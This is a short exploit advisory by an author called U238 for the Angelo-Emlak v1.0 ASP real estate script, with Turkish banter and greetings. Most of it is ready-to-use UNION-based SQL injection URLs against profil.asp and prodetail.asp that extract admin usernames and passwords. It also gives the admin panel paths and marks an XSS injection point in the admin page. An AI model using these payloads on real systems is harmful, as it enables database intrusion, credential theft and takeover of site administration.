Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable Discovered By : U238 msn :setuid.noexec0x1[+]hotmail[-].com webPage :http://noexec.blogspot.com Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr) Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ Exploit: http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1 ---------- http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin --------- Admin Panel : http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp X13 DB Editor Admin Panel : http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ This script is xss vulnerable ! .. Exploit : target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS] ">&olay=insert ---------------------------------------------------- My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS U238 | Web - Designer Solutions Developer